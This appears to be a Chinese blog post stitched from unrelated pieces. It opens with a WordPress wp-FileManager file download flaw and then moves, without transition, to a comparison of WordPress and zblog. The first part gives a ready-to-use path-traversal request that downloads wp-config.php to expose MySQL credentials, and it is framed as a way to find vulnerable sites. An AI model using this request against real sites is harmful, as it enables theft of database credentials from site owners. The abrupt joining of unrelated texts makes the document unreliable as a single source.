wordpress这种CMS国外用的非常多，安全性还是不错的，跟新快，看到这种东西，除了管理员架好之后就托管的垃圾站，持续更新的wordpress还是很让人头疼的。

漏洞详解：http://packetstormsecurity.com/files/121637/WordPress-wp-FileManager-File-Download.html

查找漏洞网站：访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download，下载wp-config，其中回显MySQL。

最近开始玩wordpress,觉得wp确实是很强大的。

zblog应该来说是国内非常不错的一款博客程序,在这里我把wordpress和zblog做个简单的对比。

1.基础构架
wp采用php+Mysql的构架,而zblog使用asp+acess的布局。

从我在”PHP、ASP与JSP的比较”一文中来看,php较之asp的优点在于安全性好、函数支持多、厂商支持多和支持XML，而缺点在于扩展性较差。

...